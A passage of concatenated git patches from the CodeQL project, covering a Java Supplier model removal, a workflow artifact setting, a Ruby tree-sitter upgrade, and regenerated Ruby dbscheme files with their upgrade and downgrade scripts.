b/java/ql/lib/ext/java.util.function.model.yml @@ -4,9 +4,3 @@ extensions: extensible: sinkModel data: - ["java.util.function", "Predicate", False, "test", "(Object)", "", "Argument[-1]", "regex-use[0]", "manual"] - - - addsTo: - pack: codeql/java-all - extensible: summaryModel - data: - - ["java.util.function", "Supplier", False, "get", "()", "", "Argument[-1]", "ReturnValue", "value", "manual"] diff --git a/java/ql/test/ext/TestModels/Test.java b/java/ql/test/ext/TestModels/Test.java index 8560ad1e565..a0e9ab2b9ff 100644 --- a/java/ql/test/ext/TestModels/Test.java +++ b/java/ql/test/ext/TestModels/Test.java @@ -77,10 +77,6 @@ public class Test { AtomicReference ar = new AtomicReference(source()); sink(ar.get()); // $hasValueFlow - // java.util.function - Supplier sup = (Supplier)source(); - sink(sup.get()); // $hasValueFlow - // java.util StringJoiner sj1 = new StringJoiner(","); sink(sj1.add((CharSequence)source())); // $hasTaintFlow diff --git a/java/ql/test/ext/TopJdkApis/TopJdkApis.qll b/java/ql/test/ext/TopJdkApis/TopJdkApis.qll index 013d212fdcb..25be28dd48f 100644 --- a/java/ql/test/ext/TopJdkApis/TopJdkApis.qll +++ b/java/ql/test/ext/TopJdkApis/TopJdkApis.qll @@ -147,6 +147,7 @@ class TopJdkApi extends SummarizedCallableBase { * `java.lang.Throwable#printStackTrace()`: should probably not be a general step, but there might be specialised queries that care * `java.util.function.Consumer#accept(Object)`: specialized lambda flow * `java.util.function.Function#apply(Object)`: specialized lambda flow + * `java.util.function.Supplier#get()`: lambda flow * `java.util.stream.Collectors#joining(CharSequence)`: cannot be modeled completely without a model for `java.util.stream.Stream#collect(Collector)` as well * `java.util.stream.Collectors#toMap(Function,Function)`: specialized collectors flow * `java.util.stream.Stream#collect(Collector)`: handled separately on a case-by-case basis as it is too complex for MaD diff --git a/java/ql/test/ext/TopJdkApis/TopJdkApisTest.expected b/java/ql/test/ext/TopJdkApis/TopJdkApisTest.expected index fd63ca00a53..43fd05bf31a 100644 --- a/java/ql/test/ext/TopJdkApis/TopJdkApisTest.expected +++ b/java/ql/test/ext/TopJdkApis/TopJdkApisTest.expected @@ -2,6 +2,7 @@ | java.lang.Throwable#printStackTrace() | no manual model | | java.util.function.Consumer#accept(Object) | no manual model | | java.util.function.Function#apply(Object) | no manual model | +| java.util.function.Supplier#get() | no manual model | | java.util.stream.Collectors#joining(CharSequence) | no manual model | | java.util.stream.Collectors#toMap(Function,Function) | no manual model | | java.util.stream.Stream#collect(Collector) | no manual model | From 600412db4889b94907735c6e91d93744be09f439 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Fri, 13 Jan 2023 08:58:53 +0100 Subject: [PATCH 262/381] Java: Ignore missing html artifacts. --- .github/workflows/mad_modelDiff.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/mad_modelDiff.yml b/.github/workflows/mad_modelDiff.yml index 018e53a49c5..8cfaac6f134 100644 --- a/.github/workflows/mad_modelDiff.yml +++ b/.github/workflows/mad_modelDiff.yml @@ -100,4 +100,6 @@ jobs: with: name: diffs path: tmp-models/*.html + # An html file is only produced if the generated models differ. + if-no-files-found: ignore retention-days: 20 From 3a887d1c920c26b4ed0f5ed14096e66a227cfec8 Mon Sep 17 00:00:00 2001 From: Arthur Baars Date: Mon, 9 Jan 2023 17:07:35 +0100 Subject: [PATCH 263/381] Ruby: update tree-sitter-{ruby, embedded-template} --- ruby/Cargo.lock | Bin 17026 -> 17026 bytes ruby/extractor/Cargo.toml | 6 +++--- ruby/generator/Cargo.toml | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/ruby/Cargo.lock b/ruby/Cargo.lock index ed1b9e2bd3b787571a9a2a0d6b7bc7122cec0fce..54d88c85db0e83d19df0b57d3d5f2d2844b920f7 100644 GIT binary patch delta 314 zcma*gF-k*05CBjjK?ybr5$#h(!pzR>-(8ZQ#Ks~iVjUZ2XLrO_!~+C!f<1vZ5WJv; z9w7aLcQ_6X$HDi0K6Efk?csd4F3gTJM7D}ZDXJu_9=sL}NWRMuGD>o68UuMX$)1SB zDpibGo7~;BtK~%-Ew*P4+DqTJ=jru+_WJg*das|oAVKtzlUkRmW5BA+m7-lBd^y9yE^ArS=!>m>kR1#oCDS!w*K@1`W*u_$Kaw2SBquVy_r$3A3 GhX0$4cyCPu xfAO}j7H54uT>h!+$ML8O=m{%WQMSOWNKg|K7!XJH*;;P1L&IO_d%D~n{{WO@SStVk diff --git a/ruby/extractor/Cargo.toml b/ruby/extractor/Cargo.toml index a5c753b6398..981b1830a96 100644 --- a/ruby/extractor/Cargo.toml +++ b/ruby/extractor/Cargo.toml @@ -9,9 +9,9 @@ edition = "2018" [dependencies] flate2 = "1.0" node-types = { path = "../node-types" } -tree-sitter = "0.19" -tree-sitter-embedded-template = { git = "https://github.com/tree-sitter/tree-sitter-embedded-template.git", rev = "1a538da253d73f896b9f6c0c7d79cda58791ac5c" } -tree-sitter-ruby = { git = "https://github.com/tree-sitter/tree-sitter-ruby.git", rev = "ad1043283b1f9daf4aad381b6a81f18a5a27fe7e" } +tree-sitter = "0.20" +tree-sitter-embedded-template = { git = "https://github.com/tree-sitter/tree-sitter-embedded-template.git", rev = "a13085849cf69e2401ec44e38cffc3d73f22f3df" } +tree-sitter-ruby = { git = "https://github.com/tree-sitter/tree-sitter-ruby.git", rev = "7a1921bcfd90e3a04c1ad011059087aaf0168dd4" } clap = "3.0" tracing = "0.1" tracing-subscriber = { version = "0.3.3", features = ["env-filter"] } diff --git a/ruby/generator/Cargo.toml b/ruby/generator/Cargo.toml index 493557e03d4..da187a7f8fa 100644 --- a/ruby/generator/Cargo.toml +++ b/ruby/generator/Cargo.toml @@ -11,5 +11,5 @@ clap = "3.0" node-types = { path = "../node-types" } tracing = "0.1" tracing-subscriber = { version = "0.3.3", features = ["env-filter"] } -tree-sitter-embedded-template = { git = "https://github.com/tree-sitter/tree-sitter-embedded-template.git", rev = "1a538da253d73f896b9f6c0c7d79cda58791ac5c" } -tree-sitter-ruby = { git = "https://github.com/tree-sitter/tree-sitter-ruby.git", rev = "ad1043283b1f9daf4aad381b6a81f18a5a27fe7e" } +tree-sitter-embedded-template = { git = "https://github.com/tree-sitter/tree-sitter-embedded-template.git", rev = "a13085849cf69e2401ec44e38cffc3d73f22f3df" } +tree-sitter-ruby = { git = "https://github.com/tree-sitter/tree-sitter-ruby.git", rev = "7a1921bcfd90e3a04c1ad011059087aaf0168dd4" } From 290167e1a35363252a1f94b542e936ec362cb92b Mon Sep 17 00:00:00 2001 From: Arthur Baars Date: Mon, 9 Jan 2023 17:08:30 +0100 Subject: [PATCH 264/381] Ruby: re-generated dbscheme/library --- .../lib/codeql/ruby/ast/internal/TreeSitter.qll | 8 ++++---- ruby/ql/lib/ruby.dbscheme | 16 ++++++++++++---- 2 files changed, 16 insertions(+), 8 deletions(-) diff --git a/ruby/ql/lib/codeql/ruby/ast/internal/TreeSitter.qll b/ruby/ql/lib/codeql/ruby/ast/internal/TreeSitter.qll index f16d166eac1..131b47d8783 100644 --- a/ruby/ql/lib/codeql/ruby/ast/internal/TreeSitter.qll +++ b/ruby/ql/lib/codeql/ruby/ast/internal/TreeSitter.qll @@ -875,10 +875,10 @@ module Ruby { final override string getAPrimaryQlClass() { result = "HashSplatArgument" } /** Gets the child of this node. */ - final UnderscoreArg getChild() { ruby_hash_splat_argument_def(this, result) } + final UnderscoreArg getChild() { ruby_hash_splat_argument_child(this, result) } /** Gets a field or child node of this node. */ - final override AstNode getAFieldOrChild() { ruby_hash_splat_argument_def(this, result) } + final override AstNode getAFieldOrChild() { ruby_hash_splat_argument_child(this, result) } } /** A class representing `hash_splat_nil` tokens. */ @@ -1572,10 +1572,10 @@ module Ruby { final override string getAPrimaryQlClass() { result = "SplatArgument" } /** Gets the child of this node. */ - final UnderscoreArg getChild() { ruby_splat_argument_def(this, result) } + final UnderscoreArg getChild() { ruby_splat_argument_child(this, result) } /** Gets a field or child node of this node. */ - final override AstNode getAFieldOrChild() { ruby_splat_argument_def(this, result) } + final override AstNode getAFieldOrChild() { ruby_splat_argument_child(this, result) } } /** A class representing `splat_parameter` nodes. */ diff --git a/ruby/ql/lib/ruby.dbscheme b/ruby/ql/lib/ruby.dbscheme index 3595c826de6..307ebf14d59 100644 --- a/ruby/ql/lib/ruby.dbscheme +++ b/ruby/ql/lib/ruby.dbscheme @@ -661,9 +661,13 @@ ruby_hash_pattern_def( unique int id: @ruby_hash_pattern ); +ruby_hash_splat_argument_child( + unique int ruby_hash_splat_argument: @ruby_hash_splat_argument ref, + unique int child: @ruby_underscore_arg ref +); + ruby_hash_splat_argument_def( - unique int id: @ruby_hash_splat_argument, - int child: @ruby_underscore_arg ref + unique int id: @ruby_hash_splat_argument ); ruby_hash_splat_parameter_name( @@ -1112,9 +1116,13 @@ ruby_singleton_method_def( int object: @ruby_singleton_method_object_type ref ); +ruby_splat_argument_child( + unique int ruby_splat_argument: @ruby_splat_argument ref, + unique int child: @ruby_underscore_arg ref +); + ruby_splat_argument_def( - unique int id: @ruby_splat_argument, - int child: @ruby_underscore_arg ref + unique int id: @ruby_splat_argument ); ruby_splat_parameter_name( From 4d3e2bb81417af8bd5742ece76f4ad9d0fe50947 Mon Sep 17 00:00:00 2001 From: Arthur Baars Date: Mon, 9 Jan 2023 17:10:39 +0100 Subject: [PATCH 265/381] Ruby: upgrade/downgrade scripts --- .../old.dbscheme | 1443 +++++++++++++++++ .../ruby.dbscheme | 1435 ++++++++++++++++ .../upgrade.properties | 6 + .../old.dbscheme | 1435 ++++++++++++++++ .../ruby.dbscheme | 1443 +++++++++++++++++ .../upgrade.properties | 6 + 6 files changed, 5768 insertions(+) create mode 100644 ruby/downgrades/307ebf14d59930ba903d71d377f6f4129d0a6d22/old.dbscheme create mode 100644 ruby/downgrades/307ebf14d59930ba903d71d377f6f4129d0a6d22/ruby.dbscheme create mode 100644 ruby/downgrades/307ebf14d59930ba903d71d377f6f4129d0a6d22/upgrade.properties create mode 100644 ruby/ql/lib/upgrades/3595c826de6db850f16b9da265a54dbf24dd3126/old.dbscheme create mode 100644 ruby/ql/lib/upgrades/3595c826de6db850f16b9da265a54dbf24dd3126/ruby.dbscheme create mode 100644 ruby/ql/lib/upgrades/3595c826de6db850f16b9da265a54dbf24dd3126/upgrade.properties diff --git a/ruby/downgrades/307ebf14d59930ba903d71d377f6f4129d0a6d22/old.dbscheme b/ruby/downgrades/307ebf14d59930ba903d71d377f6f4129d0a6d22/old.dbscheme new file mode 100644 index 00000000000..307ebf14d59 --- /dev/null +++ b/ruby/downgrades/307ebf14d59930ba903d71d377f6f4129d0a6d22/old.dbscheme @@ -0,0 +1,1443 @@ +// CodeQL database schema for Ruby +// Automatically generated from the tree-sitter grammar; do not edit + +@location = @location_default + +locations_default( + unique int id: @location_default, + int file: @file ref, + int start_line: int ref, + int start_column: int ref, + int end_line: int ref, + int end_column: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +sourceLocationPrefix( + string prefix: string ref +); + +diagnostics( + unique int id: @diagnostic, + int severity: int ref, + string error_tag: string ref, + string error_message: string ref, + string full_error_message: string ref, + int location: @location_default ref +); + +case @diagnostic.severity of + 10 = @diagnostic_debug +| 20 = @diagnostic_info +| 30 = @diagnostic_warning +| 40 = @diagnostic_error +; + + +@ruby_underscore_arg = @ruby_assignment | @ruby_binary | @ruby_conditional | @ruby_operator_assignment | @ruby_range | @ruby_unary | @ruby_underscore_primary + +@ruby_underscore_call_operator = @ruby_reserved_word + +@ruby_underscore_expression = @ruby_assignment | @ruby_binary | @ruby_break | @ruby_call | @ruby_next | @ruby_operator_assignment | @ruby_return | @ruby_unary | @ruby_underscore_arg | @ruby_yield + +@ruby_underscore_lhs = @ruby_call | @ruby_element_reference | @ruby_scope_resolution | @ruby_token_false | @ruby_token_nil | @ruby_token_true | @ruby_underscore_variable + +@ruby_underscore_method_name = @ruby_delimited_symbol | @ruby_setter | @ruby_token_constant | @ruby_token_identifier | @ruby_token_operator | @ruby_token_simple_symbol | @ruby_underscore_nonlocal_variable + +@ruby_underscore_nonlocal_variable = @ruby_token_class_variable | @ruby_token_global_variable | @ruby_token_instance_variable + +@ruby_underscore_pattern_constant = @ruby_scope_resolution | @ruby_token_constant + +@ruby_underscore_pattern_expr = @ruby_alternative_pattern | @ruby_as_pattern | @ruby_underscore_pattern_expr_basic + +@ruby_underscore_pattern_expr_basic = @ruby_array_pattern | @ruby_expression_reference_pattern | @ruby_find_pattern | @ruby_hash_pattern | @ruby_parenthesized_pattern | @ruby_range | @ruby_token_identifier | @ruby_underscore_pattern_constant | @ruby_underscore_pattern_primitive | @ruby_variable_reference_pattern + +@ruby_underscore_pattern_primitive = @ruby_delimited_symbol | @ruby_lambda | @ruby_regex | @ruby_string__ | @ruby_string_array | @ruby_subshell | @ruby_symbol_array | @ruby_token_encoding | @ruby_token_false | @ruby_token_file | @ruby_token_heredoc_beginning | @ruby_token_line | @ruby_token_nil | @ruby_token_self | @ruby_token_simple_symbol | @ruby_token_true | @ruby_unary | @ruby_underscore_simple_numeric + +@ruby_underscore_pattern_top_expr_body = @ruby_array_pattern | @ruby_find_pattern | @ruby_hash_pattern | @ruby_underscore_pattern_expr + +@ruby_underscore_primary = @ruby_array | @ruby_begin | @ruby_break | @ruby_call | @ruby_case__ | @ruby_case_match | @ruby_chained_string | @ruby_class | @ruby_delimited_symbol | @ruby_for | @ruby_hash | @ruby_if | @ruby_lambda | @ruby_method | @ruby_module | @ruby_next | @ruby_parenthesized_statements | @ruby_redo | @ruby_regex | @ruby_retry | @ruby_return | @ruby_singleton_class | @ruby_singleton_method | @ruby_string__ | @ruby_string_array | @ruby_subshell | @ruby_symbol_array | @ruby_token_character | @ruby_token_heredoc_beginning | @ruby_token_simple_symbol | @ruby_unary | @ruby_underscore_lhs | @ruby_underscore_simple_numeric | @ruby_unless | @ruby_until | @ruby_while | @ruby_yield + +@ruby_underscore_simple_numeric = @ruby_complex | @ruby_rational | @ruby_token_float | @ruby_token_integer + +@ruby_underscore_statement = @ruby_alias | @ruby_begin_block | @ruby_end_block | @ruby_if_modifier | @ruby_rescue_modifier | @ruby_undef | @ruby_underscore_expression | @ruby_unless_modifier | @ruby_until_modifier | @ruby_while_modifier + +@ruby_underscore_variable = @ruby_token_constant | @ruby_token_identifier | @ruby_token_self | @ruby_token_super | @ruby_underscore_nonlocal_variable + +ruby_alias_def( + unique int id: @ruby_alias, + int alias: @ruby_underscore_method_name ref, + int name: @ruby_underscore_method_name ref +); + +#keyset[ruby_alternative_pattern, index] +ruby_alternative_pattern_alternatives( + int ruby_alternative_pattern: @ruby_alternative_pattern ref, + int index: int ref, + unique int alternatives: @ruby_underscore_pattern_expr_basic ref +); + +ruby_alternative_pattern_def( + unique int id: @ruby_alternative_pattern +); + +@ruby_argument_list_child_type = @ruby_block_argument | @ruby_hash_splat_argument | @ruby_pair | @ruby_splat_argument | @ruby_token_forward_argument | @ruby_underscore_expression + +#keyset[ruby_argument_list, index] +ruby_argument_list_child( + int ruby_argument_list: @ruby_argument_list ref, + int index: int ref, + unique int child: @ruby_argument_list_child_type ref +); + +ruby_argument_list_def( + unique int id: @ruby_argument_list +); + +@ruby_array_child_type = @ruby_block_argument | @ruby_hash_splat_argument | @ruby_pair | @ruby_splat_argument | @ruby_token_forward_argument | @ruby_underscore_expression + +#keyset[ruby_array, index] +ruby_array_child( + int ruby_array: @ruby_array ref, + int index: int ref, + unique int child: @ruby_array_child_type ref +); + +ruby_array_def( + unique int id: @ruby_array +); + +ruby_array_pattern_class( + unique int ruby_array_pattern: @ruby_array_pattern ref, + unique int class: @ruby_underscore_pattern_constant ref +); + +@ruby_array_pattern_child_type = @ruby_splat_parameter | @ruby_underscore_pattern_expr + +#keyset[ruby_array_pattern, index] +ruby_array_pattern_child( + int ruby_array_pattern: @ruby_array_pattern ref, + int index: int ref, + unique int child: @ruby_array_pattern_child_type ref +); + +ruby_array_pattern_def( + unique int id: @ruby_array_pattern +); + +ruby_as_pattern_def( + unique int id: @ruby_as_pattern, + int name: @ruby_token_identifier ref, + int value: @ruby_underscore_pattern_expr ref +); + +@ruby_assignment_left_type = @ruby_left_assignment_list | @ruby_underscore_lhs + +@ruby_assignment_right_type = @ruby_rescue_modifier | @ruby_right_assignment_list | @ruby_splat_argument | @ruby_underscore_expression + +ruby_assignment_def( + unique int id: @ruby_assignment, + int left: @ruby_assignment_left_type ref, + int right: @ruby_assignment_right_type ref +); + +@ruby_bare_string_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_bare_string, index] +ruby_bare_string_child( + int ruby_bare_string: @ruby_bare_string ref, + int index: int ref, + unique int child: @ruby_bare_string_child_type ref +); + +ruby_bare_string_def( + unique int id: @ruby_bare_string +); + +@ruby_bare_symbol_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_bare_symbol, index] +ruby_bare_symbol_child( + int ruby_bare_symbol: @ruby_bare_symbol ref, + int index: int ref, + unique int child: @ruby_bare_symbol_child_type ref +); + +ruby_bare_symbol_def( + unique int id: @ruby_bare_symbol +); + +@ruby_begin_child_type = @ruby_else | @ruby_ensure | @ruby_rescue | @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_begin, index] +ruby_begin_child( + int ruby_begin: @ruby_begin ref, + int index: int ref, + unique int child: @ruby_begin_child_type ref +); + +ruby_begin_def( + unique int id: @ruby_begin +); + +@ruby_begin_block_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_begin_block, index] +ruby_begin_block_child( + int ruby_begin_block: @ruby_begin_block ref, + int index: int ref, + unique int child: @ruby_begin_block_child_type ref +); + +ruby_begin_block_def( + unique int id: @ruby_begin_block +); + +@ruby_binary_left_type = @ruby_underscore_expression | @ruby_underscore_simple_numeric + +case @ruby_binary.operator of + 0 = @ruby_binary_bangequal +| 1 = @ruby_binary_bangtilde +| 2 = @ruby_binary_percent +| 3 = @ruby_binary_ampersand +| 4 = @ruby_binary_ampersandampersand +| 5 = @ruby_binary_star +| 6 = @ruby_binary_starstar +| 7 = @ruby_binary_plus +| 8 = @ruby_binary_minus +| 9 = @ruby_binary_slash +| 10 = @ruby_binary_langle +| 11 = @ruby_binary_langlelangle +| 12 = @ruby_binary_langleequal +| 13 = @ruby_binary_langleequalrangle +| 14 = @ruby_binary_equalequal +| 15 = @ruby_binary_equalequalequal +| 16 = @ruby_binary_equaltilde +| 17 = @ruby_binary_rangle +| 18 = @ruby_binary_rangleequal +| 19 = @ruby_binary_ranglerangle +| 20 = @ruby_binary_caret +| 21 = @ruby_binary_and +| 22 = @ruby_binary_or +| 23 = @ruby_binary_pipe +| 24 = @ruby_binary_pipepipe +; + + +ruby_binary_def( + unique int id: @ruby_binary, + int left: @ruby_binary_left_type ref, + int operator: int ref, + int right: @ruby_underscore_expression ref +); + +ruby_block_body( + unique int ruby_block: @ruby_block ref, + unique int body: @ruby_block_body ref +); + +ruby_block_parameters( + unique int ruby_block: @ruby_block ref, + unique int parameters: @ruby_block_parameters ref +); + +ruby_block_def( + unique int id: @ruby_block +); + +ruby_block_argument_child( + unique int ruby_block_argument: @ruby_block_argument ref, + unique int child: @ruby_underscore_arg ref +); + +ruby_block_argument_def( + unique int id: @ruby_block_argument +); + +@ruby_block_body_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_block_body, index] +ruby_block_body_child( + int ruby_block_body: @ruby_block_body ref, + int index: int ref, + unique int child: @ruby_block_body_child_type ref +); + +ruby_block_body_def( + unique int id: @ruby_block_body +); + +ruby_block_parameter_name( + unique int ruby_block_parameter: @ruby_block_parameter ref, + unique int name: @ruby_token_identifier ref +); + +ruby_block_parameter_def( + unique int id: @ruby_block_parameter +); + +#keyset[ruby_block_parameters, index] +ruby_block_parameters_locals( + int ruby_block_parameters: @ruby_block_parameters ref, + int index: int ref, + unique int locals: @ruby_token_identifier ref +); + +@ruby_block_parameters_child_type = @ruby_block_parameter | @ruby_destructured_parameter | @ruby_hash_splat_parameter | @ruby_keyword_parameter | @ruby_optional_parameter | @ruby_splat_parameter | @ruby_token_forward_parameter | @ruby_token_hash_splat_nil | @ruby_token_identifier + +#keyset[ruby_block_parameters, index] +ruby_block_parameters_child( + int ruby_block_parameters: @ruby_block_parameters ref, + int index: int ref, + unique int child: @ruby_block_parameters_child_type ref +); + +ruby_block_parameters_def( + unique int id: @ruby_block_parameters +); + +@ruby_body_statement_child_type = @ruby_else | @ruby_ensure | @ruby_rescue | @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_body_statement, index] +ruby_body_statement_child( + int ruby_body_statement: @ruby_body_statement ref, + int index: int ref, + unique int child: @ruby_body_statement_child_type ref +); + +ruby_body_statement_def( + unique int id: @ruby_body_statement +); + +ruby_break_child( + unique int ruby_break: @ruby_break ref, + unique int child: @ruby_argument_list ref +); + +ruby_break_def( + unique int id: @ruby_break +); + +ruby_call_arguments( + unique int ruby_call: @ruby_call ref, + unique int arguments: @ruby_argument_list ref +); + +@ruby_call_block_type = @ruby_block | @ruby_do_block + +ruby_call_block( + unique int ruby_call: @ruby_call ref, + unique int block: @ruby_call_block_type ref +); + +@ruby_call_method_type = @ruby_token_operator | @ruby_underscore_variable + +ruby_call_method( + unique int ruby_call: @ruby_call ref, + unique int method: @ruby_call_method_type ref +); + +ruby_call_operator( + unique int ruby_call: @ruby_call ref, + unique int operator: @ruby_underscore_call_operator ref +); + +ruby_call_receiver( + unique int ruby_call: @ruby_call ref, + unique int receiver: @ruby_underscore_primary ref +); + +ruby_call_def( + unique int id: @ruby_call +); + +ruby_case_value( + unique int ruby_case__: @ruby_case__ ref, + unique int value: @ruby_underscore_statement ref +); + +@ruby_case_child_type = @ruby_else | @ruby_when + +#keyset[ruby_case__, index] +ruby_case_child( + int ruby_case__: @ruby_case__ ref, + int index: int ref, + unique int child: @ruby_case_child_type ref +); + +ruby_case_def( + unique int id: @ruby_case__ +); + +#keyset[ruby_case_match, index] +ruby_case_match_clauses( + int ruby_case_match: @ruby_case_match ref, + int index: int ref, + unique int clauses: @ruby_in_clause ref +); + +ruby_case_match_else( + unique int ruby_case_match: @ruby_case_match ref, + unique int else: @ruby_else ref +); + +ruby_case_match_def( + unique int id: @ruby_case_match, + int value: @ruby_underscore_statement ref +); + +#keyset[ruby_chained_string, index] +ruby_chained_string_child( + int ruby_chained_string: @ruby_chained_string ref, + int index: int ref, + unique int child: @ruby_string__ ref +); + +ruby_chained_string_def( + unique int id: @ruby_chained_string +); + +ruby_class_body( + unique int ruby_class: @ruby_class ref, + unique int body: @ruby_body_statement ref +); + +@ruby_class_name_type = @ruby_scope_resolution | @ruby_token_constant + +ruby_class_superclass( + unique int ruby_class: @ruby_class ref, + unique int superclass: @ruby_superclass ref +); + +ruby_class_def( + unique int id: @ruby_class, + int name: @ruby_class_name_type ref +); + +@ruby_complex_child_type = @ruby_rational | @ruby_token_float | @ruby_token_integer + +ruby_complex_def( + unique int id: @ruby_complex, + int child: @ruby_complex_child_type ref +); + +ruby_conditional_def( + unique int id: @ruby_conditional, + int alternative: @ruby_underscore_arg ref, + int condition: @ruby_underscore_arg ref, + int consequence: @ruby_underscore_arg ref +); + +@ruby_delimited_symbol_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_delimited_symbol, index] +ruby_delimited_symbol_child( + int ruby_delimited_symbol: @ruby_delimited_symbol ref, + int index: int ref, + unique int child: @ruby_delimited_symbol_child_type ref +); + +ruby_delimited_symbol_def( + unique int id: @ruby_delimited_symbol +); + +@ruby_destructured_left_assignment_child_type = @ruby_destructured_left_assignment | @ruby_rest_assignment | @ruby_underscore_lhs + +#keyset[ruby_destructured_left_assignment, index] +ruby_destructured_left_assignment_child( + int ruby_destructured_left_assignment: @ruby_destructured_left_assignment ref, + int index: int ref, + unique int child: @ruby_destructured_left_assignment_child_type ref +); + +ruby_destructured_left_assignment_def( + unique int id: @ruby_destructured_left_assignment +); + +@ruby_destructured_parameter_child_type = @ruby_block_parameter | @ruby_destructured_parameter | @ruby_hash_splat_parameter | @ruby_keyword_parameter | @ruby_optional_parameter | @ruby_splat_parameter | @ruby_token_forward_parameter | @ruby_token_hash_splat_nil | @ruby_token_identifier + +#keyset[ruby_destructured_parameter, index] +ruby_destructured_parameter_child( + int ruby_destructured_parameter: @ruby_destructured_parameter ref, + int index: int ref, + unique int child: @ruby_destructured_parameter_child_type ref +); + +ruby_destructured_parameter_def( + unique int id: @ruby_destructured_parameter +); + +@ruby_do_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_do, index] +ruby_do_child( + int ruby_do: @ruby_do ref, + int index: int ref, + unique int child: @ruby_do_child_type ref +); + +ruby_do_def( + unique int id: @ruby_do +); + +ruby_do_block_body( + unique int ruby_do_block: @ruby_do_block ref, + unique int body: @ruby_body_statement ref +); + +ruby_do_block_parameters( + unique int ruby_do_block: @ruby_do_block ref, + unique int parameters: @ruby_block_parameters ref +); + +ruby_do_block_def( + unique int id: @ruby_do_block +); + +@ruby_element_reference_child_type = @ruby_block_argument | @ruby_hash_splat_argument | @ruby_pair | @ruby_splat_argument | @ruby_token_forward_argument | @ruby_underscore_expression + +#keyset[ruby_element_reference, index] +ruby_element_reference_child( + int ruby_element_reference: @ruby_element_reference ref, + int index: int ref, + unique int child: @ruby_element_reference_child_type ref +); + +ruby_element_reference_def( + unique int id: @ruby_element_reference, + int object: @ruby_underscore_primary ref +); + +@ruby_else_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_else, index] +ruby_else_child( + int ruby_else: @ruby_else ref, + int index: int ref, + unique int child: @ruby_else_child_type ref +); + +ruby_else_def( + unique int id: @ruby_else +); + +@ruby_elsif_alternative_type = @ruby_else | @ruby_elsif + +ruby_elsif_alternative( + unique int ruby_elsif: @ruby_elsif ref, + unique int alternative: @ruby_elsif_alternative_type ref +); + +ruby_elsif_consequence( + unique int ruby_elsif: @ruby_elsif ref, + unique int consequence: @ruby_then ref +); + +ruby_elsif_def( + unique int id: @ruby_elsif, + int condition: @ruby_underscore_statement ref +); + +@ruby_end_block_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_end_block, index] +ruby_end_block_child( + int ruby_end_block: @ruby_end_block ref, + int index: int ref, + unique int child: @ruby_end_block_child_type ref +); + +ruby_end_block_def( + unique int id: @ruby_end_block +); + +@ruby_ensure_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_ensure, index] +ruby_ensure_child( + int ruby_ensure: @ruby_ensure ref, + int index: int ref, + unique int child: @ruby_ensure_child_type ref +); + +ruby_ensure_def( + unique int id: @ruby_ensure +); + +ruby_exception_variable_def( + unique int id: @ruby_exception_variable, + int child: @ruby_underscore_lhs ref +); + +@ruby_exceptions_child_type = @ruby_splat_argument | @ruby_underscore_arg + +#keyset[ruby_exceptions, index] +ruby_exceptions_child( + int ruby_exceptions: @ruby_exceptions ref, + int index: int ref, + unique int child: @ruby_exceptions_child_type ref +); + +ruby_exceptions_def( + unique int id: @ruby_exceptions +); + +ruby_expression_reference_pattern_def( + unique int id: @ruby_expression_reference_pattern, + int value: @ruby_underscore_expression ref +); + +ruby_find_pattern_class( + unique int ruby_find_pattern: @ruby_find_pattern ref, + unique int class: @ruby_underscore_pattern_constant ref +); + +@ruby_find_pattern_child_type = @ruby_splat_parameter | @ruby_underscore_pattern_expr + +#keyset[ruby_find_pattern, index] +ruby_find_pattern_child( + int ruby_find_pattern: @ruby_find_pattern ref, + int index: int ref, + unique int child: @ruby_find_pattern_child_type ref +); + +ruby_find_pattern_def( + unique int id: @ruby_find_pattern +); + +@ruby_for_pattern_type = @ruby_left_assignment_list | @ruby_underscore_lhs + +ruby_for_def( + unique int id: @ruby_for, + int body: @ruby_do ref, + int pattern: @ruby_for_pattern_type ref, + int value: @ruby_in ref +); + +@ruby_hash_child_type = @ruby_hash_splat_argument | @ruby_pair + +#keyset[ruby_hash, index] +ruby_hash_child( + int ruby_hash: @ruby_hash ref, + int index: int ref, + unique int child: @ruby_hash_child_type ref +); + +ruby_hash_def( + unique int id: @ruby_hash +); + +ruby_hash_pattern_class( + unique int ruby_hash_pattern: @ruby_hash_pattern ref, + unique int class: @ruby_underscore_pattern_constant ref +); + +@ruby_hash_pattern_child_type = @ruby_hash_splat_parameter | @ruby_keyword_pattern | @ruby_token_hash_splat_nil + +#keyset[ruby_hash_pattern, index] +ruby_hash_pattern_child( + int ruby_hash_pattern: @ruby_hash_pattern ref, + int index: int ref, + unique int child: @ruby_hash_pattern_child_type ref +); + +ruby_hash_pattern_def( + unique int id: @ruby_hash_pattern +); + +ruby_hash_splat_argument_child( + unique int ruby_hash_splat_argument: @ruby_hash_splat_argument ref, + unique int child: @ruby_underscore_arg ref +); + +ruby_hash_splat_argument_def( + unique int id: @ruby_hash_splat_argument +); + +ruby_hash_splat_parameter_name( + unique int ruby_hash_splat_parameter: @ruby_hash_splat_parameter ref, + unique int name: @ruby_token_identifier ref +); + +ruby_hash_splat_parameter_def( + unique int id: @ruby_hash_splat_parameter +); + +@ruby_heredoc_body_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_heredoc_content | @ruby_token_heredoc_end + +#keyset[ruby_heredoc_body, index] +ruby_heredoc_body_child( + int ruby_heredoc_body: @ruby_heredoc_body ref, + int index: int ref, + unique int child: @ruby_heredoc_body_child_type ref +); + +ruby_heredoc_body_def( + unique int id: @ruby_heredoc_body +); + 